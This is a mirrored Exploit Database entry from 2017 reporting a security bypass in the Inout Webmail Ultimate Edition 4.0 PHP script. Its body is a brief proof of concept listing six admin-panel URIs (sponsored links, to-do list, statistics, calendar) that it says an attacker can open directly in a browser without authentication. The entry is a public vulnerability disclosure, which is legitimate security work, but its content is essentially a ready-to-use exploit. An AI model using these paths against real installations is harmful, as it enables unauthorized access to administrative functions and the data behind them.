Inout Webmail Ultimate Edition 4.0 Script – Improper Access Restrictions

• Exploit Database
• 15 阅读

• 作者： Ihsan Sencan
  日期： 2017-01-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/41050/

• # # # # # 
  # Vulnerability: Security Bypass
  # Date: 13.01.2017
  # Vendor Homepage: http://www.inoutscripts.com/
  # Script Name: Inout Webmail Ultimate Edition v4.0
  # Script Version: Ultimate Edition v4.0, Ultimate Hypertable Version
  # Script Buy Now: http://www.inoutscripts.com/demo/inout-webmail/demo/
  # Author: İhsan Şencan
  # Author Web: http://ihsan.net
  # Mail : ihsan[beygir]ihsan[nokta]net
  # # # # # 
  # Direct entrance..
  # An attacker can exploit this issue via a browser.
  # The following example URIs are available:
  # http://localhost/[PATH]/admin/index.php?page=ads/sponsoredlinks
  # http://localhost/[PATH]/admin/index.php?page=todolist/todolist
  # http://localhost/[PATH]/admin/index.php?page=statistics/registration_showgraph
  # http://localhost/[PATH]/admin/index.php?page=statistics/showgraph
  # http://localhost/[PATH]/admin/index.php?page=statistics/accountactivity
  # http://localhost/[PATH]/admin/index.php?page=calendar/calendar
  # Vs.......
  # # # # #